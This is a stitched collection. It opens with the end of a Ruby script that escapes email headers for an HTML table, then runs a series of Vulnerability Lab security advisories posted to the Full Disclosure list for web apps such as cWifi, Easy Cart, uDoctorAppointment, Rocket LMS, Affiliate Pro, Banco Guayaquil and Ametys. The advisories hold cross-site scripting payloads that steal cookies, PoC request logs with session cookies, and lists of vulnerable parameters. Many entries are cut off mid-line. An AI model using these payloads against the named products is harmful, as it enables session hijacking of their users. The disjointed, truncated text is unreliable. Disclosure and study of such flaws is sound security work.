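# written, and treat every other header the same way.
def export_row(msg)
  cells = [decode_encoded_words(msg[:subject]), msg[:from], msg[:to], msg[:date]]
  "<tr>" + cells.map { |c| "<td>#{CGI.escapeHTML(c.to_s)}</td>" }.join + "</tr>"
end

# Builds the export table with the German headings seen in the dump above.
def export_html(messages, row_builder = :export_row)
  rows = messages.map { |m| send(row_builder, m) }
  "<table>\n<tr><th>Betreff</th><th>Von</th><th>An</th><th>Datum</th></tr>\n#{rows.join("\n")}\n</table>"
end

if __FILE__ == $PROGRAM_NAME
  puts export_html(SAMPLE_MESSAGES)
end
```

Running the file prints the hardened export; the vulnerable builder is kept only so the two can be compared in a test. The same decode-then-escape rule applies to the From and To headers, which can carry encoded display names.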
[FD] cWifi Hotspot Wireless CP - Code Execution Vulnerability
Document Title:
===
cWifi Hotspot Wireless CP - Code Execution Vulnerability

References (Source):
===
https://www.vulnerability-lab.com/get_content.php?id=2310

Release Date:
===
2021-12-15

Vulnerability Laboratory ID (VL-ID):
===
2310

Common Vulnerability Scoring System:
===
8.2

Vulnerability Class:
===
Code Execution

Current Estimated Price:
===
2.000€ - 3.000€

Abstract Advisory Information:
===
The vulnerability laboratory core research team discovered a code execution vulnerability in the cWifi Hotspot Wireless Captive Portal.

Affected Product(s):
===
Product: cWifi Hotspot Wireless Captive Portal - (PHP) (Web-Application)

Vulnerability Disclosure Timeline:
===
2021-12-15: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
===
Published

Exploitation Technique:
===
Remote

Severity Level:
===
High

Authentication Type:
===
Restricted Authentication (Guest Privileges)

User Interaction:
===
No User Interaction

Disclosure Type:
===
Independent Security Research

Technical Details & Description:
===
A code execution vulnerability has been discovered in the official cWifi Hotspot wireless captive portal web-application.

The vulnerability is located in the login-status POST request of the spot-cwifi portal. Remote attackers are able to inject their own malicious IP and MAC address values into the POST data, which, in combination with the PHPSESSID, results in several different types of vulnerabilities. Attackers can provoke client-side script code execution via the `mac` or `ip` parameter of the status POST request, which allows them to gain access to the victim's wifi connection and session credentials. The issue can be exploited by a remote attacker after connecting to the wifi as a guest or member. The parameters of the POST request are not sanitized correctly, which results in client-side execution.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] /v2/
[+] /logout

Vulnerable File(s):
[+] status.php

Vulnerable Parameter(s):
[+] ip
[+] mac
[+] adress

Proof of Concept (PoC):
===
The critical code execution vulnerability can be exploited by remote attackers with guest access or with an authenticated user account.
For security demonstration or to reproduce the web vulnerability follow the provided information and steps below to continue.

Vulnerable Source: status.php (v2/status.php - http://spot.cwifi.de/status)
MAC-Adresse (MAC address): <[MALICIOUS INJECTED CODE EXECUTION!]>
IP Adresse (IP address): <[MALICIOUS INJECTED CODE PAYLOAD EXECUTION!]>
Bytes up/down: 7.2 MiB / 221.6 MiB
Session time: 7m56s
abmelden (log out)
abmelden und Daten löschen (log out and delete data)
--
logout status
you have just logged out
user name <[MALICIOUS INJECTED CODE PAYLOAD EXECUTION!]>
IP address <[MALICIOUS INJECTED CODE PAYLOAD EXECUTION!]>
MAC address <[MALICIOUS INJECTED CODE PAYLOAD EXECUTION!]>
session time 4m12s
time left 23h55m48s
bytes up/down: 49.1 KiB / 169.2 KiB
http://spot.cwifi.de/login"; name="login" onsubmit="return openLogin()">

--- PoC Session Logs (POST) ---
POST /v2/status.php HTTP/1.1
Host: hotspot.cwifi.de
Content-Length: 1129
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="93", " Not;A Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://spot.cwifi.de
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: document
Referer: http://spot.cwifi.de/
Accept-Encoding: gzip, deflate
Accept-Language: de-DE,de;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
-
hostname=spot.cwifi.de&identity=Client2822&login-by=http-pap&plain-passwd=yes&server-address=<[MALICIOUS INJECTED CODE!]>%3A80&ssl-login=no
&server-name=Client2822_HotSpot&link-login=http%3A%2F%2Fspot.cwifi.de%2Flogin&link-login-only=http%3A%2F%2Fspot.cwifi.de%2Flogin
&link-logout=http%3A%2F%2Fspot.cwifi.de%2Flogout&link-status=http%3A%2F%2Fspot.cwifi.de%2Fstatus&link-orig=
&domain=&interface-name=2_HotSpotA&ip=<[MALICIOUS INJECTED CODE!]>&logged-in=yes&mac=<[MALICIOUS INJECTED CODE!]>&trial=no&username=90%3ACC%3ADF%3A96%3AF6%3A59
&host-ip=<[MALICIOUS INJECTED CODE!]>&idle-timeout=5h&idle-timeout-secs=18000&limit-bytes-in=&limit-bytes-out=&refresh-timeout=1m&refresh-timeout-secs=60
&session-timeout=23h52m4s&session-timeout-secs=85924&session-time-left=23h52m4s&s
[FD] Easy Cart Shopping Cart - (Search) Persistent Vulnerability
Document Title:
===
Easy Cart Shopping Cart - (Search) Persistent Vulnerability

References (Source):
===
https://www.vulnerability-lab.com/get_content.php?id=2298

Release Date:
===
2021-12-15

Vulnerability Laboratory ID (VL-ID):
===
2298

Common Vulnerability Scoring System:
===
5.1

Vulnerability Class:
===
Cross Site Scripting - Non Persistent

Current Estimated Price:
===
500€ - 1.000€

Product & Service Introduction:
===
A mobile-friendly, SEO optimized and easy-to-install (with a free installation also offered on request) PHP shopping cart script that can be used to add e-commerce functionality to existing sites or to create simple online stores. Easy Cart is a PHP script allowing you to create a simple shopping cart website or integrate shopping cart functionality into an existing site; users will be able to browse the products, add them to the cart, check out and make a payment.

(Copy of the Homepage: https://www.netartmedia.net/easy-cart )

Abstract Advisory Information:
===
The vulnerability laboratory core research team discovered a cross site scripting web vulnerability in the Easy Cart Shopping Cart PHP Script.

Affected Product(s):
===
NetArt Media
Product: Easy Cart Shopping Cart (v2021) - CMS (Web-Application)

Vulnerability Disclosure Timeline:
===
2021-09-01: Researcher Notification & Coordination (Security Researcher)
2021-09-02: Vendor Notification (Security Department)
2021-**-**: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2021-12-15: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
===
Published

Exploitation Technique:
===
Remote

Severity Level:
===
Medium

Authentication Type:
===
Pre Auth (No Privileges or Session)

User Interaction:
===
Low User Interaction

Disclosure Type:
===
Responsible Disclosure

Technical Details & Description:
===
A non-persistent POST injection web vulnerability has been discovered in the official Easy Cart Shopping Cart PHP Script. The vulnerability allows remote attackers to inject malicious script code into POST method requests to compromise user session data or to manipulate application content shown to clients.

The cross site scripting web vulnerability is located in the `keyword_search` parameter of the `index search` module. Remote attackers without privileged access are able to inject malicious script code into the search input field of the index module's POST request. Execution takes place on the search results page after the form is submitted via POST. Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent external redirects to a malicious source and non-persistent manipulation of the affected application modules.

Request Method(s):
[+] POST

Vulnerable Input(s):
[+] Search (index)

Vulnerable Parameter(s):
[+] keyword_search

Proof of Concept (PoC):
===
The client-side POST injection web vulnerability can be exploited by remote attackers without an account and with low or medium user interaction.
For security demonstration or to reproduce the cross site web vulnerability follow the provided information and steps below to continue.

PoC: Payload
"

--- PoC Session Logs (POST) ---
https://easy-cart.localhost:8000/cart/index.php
Host: easy-cart.localhost:8000
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 228
Origin: https://easy-cart.localhost:8000
Connection: keep-alive
Referer: https://easy-cart.localhost:8000/cart/index.php
Cookie: PHPSESSID=24d238178bfb19f9bd93f25f1b465885
page=products&proceed_search=1&keyword_search=>"&amount=$299 - $549&only_picture=0
-
POST: HTTP/2.0 200 OK
server: Apache
cache-control: no-store, no-cache, must-revalidate
pragma: no-cache
vary: Accept-Encoding
content-encoding: gzip
content-length: 2496
content-type: text/html; charset=UTF-8
-
https://easy-cart.localhost:8000/cart/evil.source
Host: easy-cart.localhost:8000
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
Referer: https://easy-cart.localhost:8000/cart/index.php
Cookie: PHPSESSID=24d238178bfb19f9bd93f25f1b465885
-
GET: HTTP/2.0 200 OK
server: Apache
vary: Accept-Encoding
content-encoding: gzip
content-length: 703
content-type: text/html; charset=UTF-8

PoC: Exploit
PoC
#nodisplay { display:none; }
https://easy-cart.localhost:8000/cart/index.php"; method="post">
function submitForm
[FD] uDoctorAppointment v2.1.1 - Multiple XSS Vulnerabilities
Document Title:
===============
uDoctorAppointment v2.1.1 - Multiple XSS Vulnerabilities

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2288

Release Date:
=============
2021-12-15

Vulnerability Laboratory ID (VL-ID):
====================================
2288

Common Vulnerability Scoring System:
====================================
5

Vulnerability Class:
====================
Cross Site Scripting - Non Persistent

Current Estimated Price:
========================
500€ - 1.000€

Product & Service Introduction:
===============================
Clinic management, doctor or therapist online medical appointment scheduling system for the management of health care. The uDoctorAppointment script allows doctors to register and choose an appropriate membership plan with different features. Patients can view doctor profiles before booking appointments. The site administrator or doctor may create and manage advanced schedules, create working time slots for each day of the week, define time off, etc.

(Copy of the Homepage: https://www.apphp.com/codemarket/items/1/udoctorappointment-php-script )

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple non-persistent cross site scripting web vulnerabilities in the uDoctorAppointment script web-application.

Affected Product(s):
====================
ApPHP
Product: uDoctorAppointment v2.1.1 - Health Care Script (PHP) (Web-Application)
Product: ApPHP MVC Framework v1.1.5 (Framework)

Vulnerability Disclosure Timeline:
==================================
2021-09-01: Researcher Notification & Coordination (Security Researcher)
2021-09-02: Vendor Notification (Security Department)
2021-09-10: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2021-12-15: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Authentication Type:
====================
Pre Auth (No Privileges or Session)

User Interaction:
=================
Low User Interaction

Disclosure Type:
================
Responsible Disclosure

Technical Details & Description:
================================
Multiple non-persistent cross site scripting vulnerabilities have been discovered in the official uDoctorAppointment v2.1.1 script web-application. The vulnerabilities allow remote attackers to inject their own malicious script code with a non-persistent attack vector and so compromise browser-to-web-application requests on the client side.

The cross site scripting vulnerabilities are located in the `created_at`, `created_date`, `sent_at` and `appointment_date` parameters of the `filter` web module. The injection point is the parameter value and the execution occurs in the filter module, which reflects the submitted value. The request method to inject the malicious script code is GET and the attack vector is non-persistent on the client side.

Successful exploitation of the vulnerabilities results in session hijacking, non-persistent phishing attacks, non-persistent external redirects to malicious sources and non-persistent manipulation of affected application modules.

Request Method(s):
[+] GET

Vulnerable Module(s):
[+] ./doctorReviews/doctorReviews
[+] ./orders/orders
[+] /mailingLog/manage
[+] /orders/doctorsManage
[+] /news/manage
[+] /newsSubscribers/manage
[+] /doctorReviews/manage/status/approved
[+] /appointments/manage

Vulnerable Parameter(s):
[+] created_at
[+] created_date
[+] sent_at
[+] appointment_date

Affected Module(s):
[+] Filter

Proof of Concept (PoC):
=======================
The client-side cross site scripting web vulnerabilities can be exploited by remote attackers without an account and with low user interaction. For security demonstration or to reproduce the cross site scripting web vulnerability follow the provided information and steps below to continue.

Exploitation: Payload
">%20

Role: Patient (Frontend - created_at)
https://doctor-appointment.localhost:8080/doctorReviews/doctorReviews?patient_name=test&created_at=2021-09-08&but_filter=Filter
-
https://doctor-appointment.localhost:8080/doctorReviews/doctorReviews?patient_name=test&created_at=%22%3E%3Ciframe%20src=a%20onload=alert(document.cookie)%3E&but_filter=Filter

Role: Doctor (Frontend - created_date)
https://doctor-appointment.localhost:8080/orders/orders?order_number=test&created_date=2021-09-08&status=2&but_filter=Filter
-
https://doctor-appointment.localhost:8080/orders/orders?order_number=test&created_date=%22%3E%3Ciframe%20src=a%20onload=alert(document.cookie)%3E&status=2&but_filter=Filter

Role: Admin (Backend - sent_at)
https://doctor-appointment.localhost:8080/mailingLog/manage?email_subject=test1&email_content=test2&email_from=test3&email_to=test4&sent_at=2021-09-01&status=0&but_filter=Filter
https://doctor-appointme
[FD] Rocket LMS v1.1 - (History) Persistent XSS Vulnerability
Document Title:
===============
Rocket LMS v1.1 - (History) Persistent XSS Vulnerability

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2305

Release Date:
=============
2021-12-29

Vulnerability Laboratory ID (VL-ID):
====================================
2305

Common Vulnerability Scoring System:
====================================
5.4

Vulnerability Class:
====================
Cross Site Scripting - Persistent

Current Estimated Price:
========================
500€ - 1.000€

Product & Service Introduction:
===============================
Rocket LMS is an online course marketplace with a pile of features that helps you to run your online education business easily. This product helps instructors and students to get in touch together and share knowledge. Instructors will be able to create unlimited video courses, live classes, text courses, projects, quizzes, files, etc., and students will be able to use the educational material and increase their skill level. Rocket LMS is based on real business needs, cultural differences and advanced user research, so the product covers your business requirements efficiently.

(Copy of the Homepage: https://lms.rocket-soft.org/ )

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a persistent cross site scripting web vulnerability in the Rocket LMS v1.1 cms.

Affected Product(s):
====================
Rocketsoft
Product: Rocket LMS v1.1 - eLearning Platform CMS (Web-Application)

Vulnerability Disclosure Timeline:
==================================
2021-09-03: Researcher Notification & Coordination (Security Researcher)
2021-09-04: Vendor Notification (Security Department)
2021-**-**: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2021-12-29: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Authentication Type:
====================
Restricted Authentication (User Privileges)

User Interaction:
=================
Low User Interaction

Disclosure Type:
================
Responsible Disclosure

Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in the official Rocket LMS v1.1 cms web-application. The vulnerability allows remote attackers to inject their own malicious script code with a persistent attack vector and so compromise browser-to-web-application requests from the application side.

The vulnerability is located in the support ticket message body, which does not sanitize the submitted message input. Remote attackers with low privileged application user accounts are able to inject their own malicious script code with a persistent attack vector. The request method to inject is POST. After the injection the message is displayed again to the user and in the support backend (admin), where the payload executes. The issue can be exploited from the organization, student and instructor account roles.

Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious sources and persistent manipulation of affected application modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] conversations Support - New Ticket

Vulnerable Input(s):
[+] Subject

Vulnerable Parameter(s):
[+] title

Affected Module(s):
[+] Messages History

Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by remote attackers with a low privileged user account and with low user interaction. For security demonstration or to reproduce the persistent cross site scripting web vulnerability follow the provided information and steps below to continue.

PoC: Payload

--- PoC Session Logs (POST) ---
https://lms.rocket-soft.org/panel/support/store
Host: lms.rocket-soft.org
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 271
Origin: https://lms.rocket-soft.org
Connection: keep-alive
Referer: https://lms.rocket-soft.org/panel/support/new
Cookie: webinar_session=eyJpdiI6ImNUeG9hcmFEbXFUSGxZd0NOZ3J6R0E9PSIsInZhbHVlIjoiWXFSOGRXYWFHcUUvc0VuNUpzanhBZjdBc21lRy8xaEhTU0hQTnk2YWlJM1ZHYkxXdzc3T3U2Nm9yMEI3b2o2QmtCT2NjdEkyRVNwdlhWUjgwY0ZHWkNyVHJSdnBCck8vVWo4MFVsK2JvLzRDUm1BRm5zU2Y0SWZWdGR1b29keWwiLCJtYWMiOiIxODI3NDQ2OTcxZDMwNjA0M2U0OGM3YzZmNmMzM2Y1OTk5ZTNiZTIzY2E2ZGQxMTlkYzY2YzY0Y2M5OTI5MTc5In0%3D; TawkConnectionTime=0; __tawkuuid=e::lms.rocket-soft.org::W9t6jOO76CukDtwwAughTc4sTzqsd2xAqZJpiyabjsp3sI9le/SuCBxWz7ekNzR0::2; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=eyJpdiI6Ik9iUEZFNlZBYjJSOEVjSE1hRlNiZFE9PSIsInZhbHVlIjoiR3F1RWFsb01KREQ2K05FaG5MT1
[FD] Affiliate Pro v1.7 - Multiple Cross Site Vulnerabilities
Document Title:
===============
Affiliate Pro v1.7 - Multiple Cross Site Vulnerabilities

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2281

Release Date:
=============
2022-01-05

Vulnerability Laboratory ID (VL-ID):
====================================
2281

Common Vulnerability Scoring System:
====================================
5.1

Vulnerability Class:
====================
Cross Site Scripting - Non Persistent

Current Estimated Price:
========================
500€ - 1.000€

Product & Service Introduction:
===============================
Affiliate Pro is a powerful and yet simple to use PHP affiliate management system for your new or existing website. Let affiliates sell your products, bring you traffic or even leads and reward them with a commission. More importantly, use Affiliate Pro to track it intelligently to keep your affiliates happy and also your bottom line! So how does it work? It is pretty simple: when a user visits your website through an affiliate URL, the affiliate responsible for sending the traffic to you will receive a commission based on your settings.

(Copy of the Homepage: https://jdwebdesigner.com/ & https://codecanyon.net/item/affiliate-pro-affiliate-management-system/12908496 )

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple reflected cross site scripting web vulnerabilities in the Affiliate Pro - Affiliate Management System v1.7.

Affected Product(s):
====================
jdwebdesigner
Product: Affiliate Pro v1.7 - Affiliate Management System (PHP) (Web-Application)

Vulnerability Disclosure Timeline:
==================================
2021-08-22: Researcher Notification & Coordination (Security Researcher)
2021-08-23: Vendor Notification (Security Department)
2021-08-30: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2022-01-05: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Authentication Type:
====================
Restricted Authentication (Guest Privileges)

User Interaction:
=================
Low User Interaction

Disclosure Type:
================
Responsible Disclosure

Technical Details & Description:
================================
Multiple reflected cross site scripting web vulnerabilities have been discovered in the Affiliate Pro - Affiliate Management System v1.7. The vulnerabilities allow remote attackers to inject their own malicious script code with a non-persistent attack vector and so compromise client-side browser-to-web-application requests.

The non-persistent cross site scripting vulnerabilities are located in the `email`, `username` and `fullname` parameters of the `index` module. Attackers are able to inject their own malicious script code into the `Fullname`, `Username` or `Email` input fields to manipulate client-side requests. The request method to inject is POST and the attack vector is non-persistent (reflected) on the client side. The injection and execution points are located in the index form where affiliates sign up: the submitted values are written back into the form's `value` attributes, and a value that closes the attribute and the tag is rendered as markup.

Successful exploitation of the vulnerabilities results in session hijacking, non-persistent phishing attacks, non-persistent external redirects to malicious sources and non-persistent manipulation of affected application modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] index

Vulnerable Input(s):
[+] Email
[+] Username
[+] Fullname

Vulnerable Parameter(s):
[+] email
[+] username
[+] fullname

Proof of Concept (PoC):
=======================
The client-side cross site scripting web vulnerability can be exploited by remote attackers without an account and with low or medium user interaction. For security demonstration or to reproduce the cross site scripting web vulnerability follow the provided information and steps below to continue.

Exploitation: Payload
%3cscript%3ealert(1337)%3c%2fscript%3

--- PoC Session Logs (POST) ---
POST /affiliate-pro-demo/index HTTP/1.1
Host: affiliates-pro.localhost:8000
Origin: http://affiliates-pro.localhost:8000
Cookie: session_id=92b8a43b5bdf5d1c54999bfbcf702f24
Referer: http://affiliates-pro.localhost:8000/affiliate-pro-demo/
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
-
fullname= &username=@pwnd.coml00fp%22%3e%3cscript%3ealert(1337)%3c%2fscript%3ewkgzv &p=test&confirmpwd=j2B%21p5o%21K8
-
HTTP/1.1 200 OK
Server: Apache
Set-Cookie: session_id=92b8a43b5bdf5d1c54999bfbcf702f24; path=/; HttpOnly
Connection: Upgrade, close
Vary: Accept-Encoding
Content-Length: 6549
Content-Type: text/html; charset=UTF-8

Vulnerable Source: Index
Full Name
" required="required">
Username
" required>
E-Mail Address
" required>

Security Risk:
[FD] Banco Guayaquil v8.0.0 iOS - Cross Site Scripting Web Vulnerability
Document Title:
===============
Banco Guayaquil v8.0.0 iOS - Cross Site Web Vulnerability

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2315

Release Date:
=============
2022-01-21

Vulnerability Laboratory ID (VL-ID):
====================================
2315

Common Vulnerability Scoring System:
====================================
4.6

Vulnerability Class:
====================
Cross Site Scripting - Persistent

Current Estimated Price:
========================
500€ - 1.000€

Product & Service Introduction:
===============================
Official application of Banco Guayaquil to manage your finances and your products with Banco Guayaquil: make transactions from your accounts, pay credit cards, loans and services, access your movements, deposit checks, request checkbooks, block cards, activate or deactivate Internet consumption and much more.

(Copy of the Homepage: https://apps.apple.com/ec/app/banco-guayaquil/id624963066 )

Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered a persistent cross site scripting web vulnerability in the official Banco Guayaquil 8.0.0 mobile iOS app.

Affected Product(s):
====================
Banco de Guayaquil
Product: Banco Guayaquil v8.0.0 - Apple iOS (Web-Application)

Vulnerability Disclosure Timeline:
==================================
2022-01-21: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Exploitation Technique:
=======================
Local

Severity Level:
===============
Medium

Authentication Type:
====================
Restricted Authentication (User Privileges)

User Interaction:
=================
No User Interaction

Disclosure Type:
================
Independent Security Research

Technical Details & Description:
================================
An application-side input validation vulnerability has been discovered in the official Banco Guayaquil 8.0.0 mobile iOS application. The vulnerability allows a local attacker to inject their own script code as payload into the application side of the vulnerable service function or module.

The vulnerability is located in the TextBox Name Profile input. The stored code executes on every review of the profile after the application starts. The attack vector of the vulnerability is persistent and the request method to inject is POST.

Request Method(s):
[+] Import

Vulnerable Module(s):
[+] Add Name

Vulnerable Parameter(s):
[+] TextBox Name Profile

Vulnerable Final(s):
[+] Save Profile

Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by local attackers with a system user account and without user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Install the iOS application on your iOS device (https://apps.apple.com/ec/app/banco-guayaquil/id624963066)
2. Add a new name as profile with the script code payload in the TextBox Name input
3. Save the profile via submit
4. Close the mobile application to restart it
5. Open the mobile iOS application again
6. The payload now executes directly on review without interaction
7. Successful reproduction of the persistent web vulnerability!

Proof of Concept (IMAGES):
https://i.imgur.com/Cc1VFUf.png
https://i.imgur.com/r1HWwrs.png

Proof of Concept (VIDEO):
https://imgur.com/a/lQHt1br

Payload: Cross Site Scripting
Use Breaks JS Context:
,javascript:alert,
text/html;base64,PHNjcmlwdD5hbGVydCgiVnVsbmVyYWJsZSIpOzwvc2NyaXB0Pg
(The base64 string decodes to a script element calling alert("Vulnerable").)

Solution - Fix & Patch:
=======================
The vulnerability can be resolved by encoding and securely parsing/escaping the inputs. In a second step, the output location where the execution occurs needs to be sanitized.

Security Risk:
==============
The security risk of the persistent input validation web vulnerability in the mobile iOS web-application is estimated as medium.

Credits & Authors:
==================
Taurus Omar - https://www.vulnerability-lab.com/show.php?user=TaurusOmar

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages, so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databa
[FD] Ametys v4.4.1 CMS - Cross Site Scripting Vulnerability
Document Title:
===============
Ametys v4.4.1 CMS - Cross Site Scripting Vulnerability

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2275

Release Date:
=============
2022-01-12

Vulnerability Laboratory ID (VL-ID):
====================================
2275

Common Vulnerability Scoring System:
====================================
5.2

Vulnerability Class:
====================
Cross Site Scripting - Persistent

Current Estimated Price:
========================
500€ - 1.000€

Product & Service Introduction:
===============================
Build powerful and stunning websites. Whether you need an advanced corporate website, a powerful landing page, a professional blog or an event website, all the tools to make creative digital experiences are at your fingertips with Ametys. No coding skills needed. Ametys makes it easy for everyone to create and manage a unified digital platform. Ametys delivers a simple and intuitive interface with a familiar ribbon Office-style interface.

(Copy of the Homepage: https://www.ametys.org/community/en/ametys-platform/ametys-portal/overview.html )

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a persistent input validation web vulnerability in the Ametys v4.4.1 cms web-application.

Affected Product(s):
====================
Ametys
Product: Ametys v4.4.1 - Content Management System (Web-Application)

Vulnerability Disclosure Timeline:
==================================
2021-07-24: Researcher Notification & Coordination (Security Researcher)
2021-07-25: Vendor Notification (Security Department)
2021-**-**: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2022-01-12: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Authentication Type:
====================
Restricted Authentication (User Privileges)

User Interaction:
=================
Low User Interaction

Disclosure Type:
================
Responsible Disclosure

Technical Details & Description:
================================
A persistent script code injection web vulnerability has been discovered in the official Ametys v4.4.1 cms web-application. The vulnerability allows remote attackers to inject their own malicious script code with a persistent attack vector and so compromise browser-to-web-application requests from the application side.

The vulnerability is located in the link text, small description and description input fields of the add external link function. The function is located, for example, in the link directory of the backend. Added links are listed with status and details. Attackers with low privileges are able to add their own malformed link with malicious script code in the marked vulnerable parameters. After the injection the links are displayed in the backend, where the execution takes place on preview of the main link directory. The attack vector of the vulnerability is persistent and the request method to inject is POST.

Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious sources and persistent manipulation of affected application modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Link Directory (Add)

Vulnerable Function(s):
[+] add (External Link)

Vulnerable Parameter(s):
[+] Link Text
[+] Small description
[+] Description

Affected Module(s):
[+] Frontend (Main Link Listing)
[+] Backend (Link Directory)

Proof of Concept (PoC):
=======================
The persistent web vulnerability can be exploited by remote attackers with low privileged user accounts and with low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Open the application path and log in to the service as a restricted user that is allowed to create links
2. Open the link directory and create a new link (top|left)
3. Inject the test payloads into the link text, small description and description fields and save via POST
4. On visiting the link directory the payloads execute in the backend listing or the frontend
5. Successful reproduction of the persistent web vulnerability!

Payload(s):
poc_link
poc_link

Vulnerable Source: Link Directory - Link (Add)
class="x-grid-cell-inner " style="text-align:left;"
poc_linkpoc_link
test.de
Normal

--- PoC Session Logs (POST) ---
https://ametys.localhost:8000.localhost:8000/cms/plugins/core-ui/servercomm/messages.xml
Host: ametys.localhost:8000.localhost:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: */*
Accept-Language: de,en-
[FD] uBidAuction v2.0.1 - Multiple XSS Web Vulnerabilities
Document Title:
===============
uBidAuction v2.0.1 - Multiple XSS Web Vulnerabilities

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2289

Release Date:
=============
2022-01-21

Vulnerability Laboratory ID (VL-ID):
====================================
2289

Common Vulnerability Scoring System:
====================================
5.4

Vulnerability Class:
====================
Cross Site Scripting - Non Persistent

Current Estimated Price:
========================
500€ - 1.000€

Product & Service Introduction:
===============================
uBidAuction is a powerful, scalable and fully-featured classic and bid auction software that lets you create the ultimate profitable online auctions website. It allows you to manage the entire online auction operation: create new auctions within seconds, view members' auctions and use the auction extension settings tool.

(Copy of the Homepage: https://www.apphp.com/codemarket/items/48/ubidauction-php-classic-and-bid-auctions-script )

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple non-persistent cross site scripting web vulnerabilities in the uBidAuction v2.0.1 script web-application.

Affected Product(s):
====================
ApPHP
Product: uBidAuction v2.0.1 - Auction Script (PHP) (Web-Application)
Product: ApPHP MVC Framework v1.2.2 (Framework)

Vulnerability Disclosure Timeline:
==================================
2021-09-01: Researcher Notification & Coordination (Security Researcher)
2021-09-02: Vendor Notification (Security Department)
2021-09-07: Vendor Response/Feedback (Security Department)
2022-**-**: Vendor Fix/Patch (Service Developer Team)
2022-**-**: Security Acknowledgements (Security Department)
2022-01-21: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Authentication Type:
====================
Pre Auth (No Privileges or Session)

User Interaction:
=================
Low User Interaction

Disclosure Type:
================
Responsible Disclosure

Technical Details & Description:
================================
Multiple non-persistent cross site scripting vulnerabilities have been discovered in the official uBidAuction v2.0.1 script web-application. The vulnerabilities allow remote attackers to inject their own malicious script code with a non-persistent attack vector and so compromise browser-to-web-application requests on the client side.

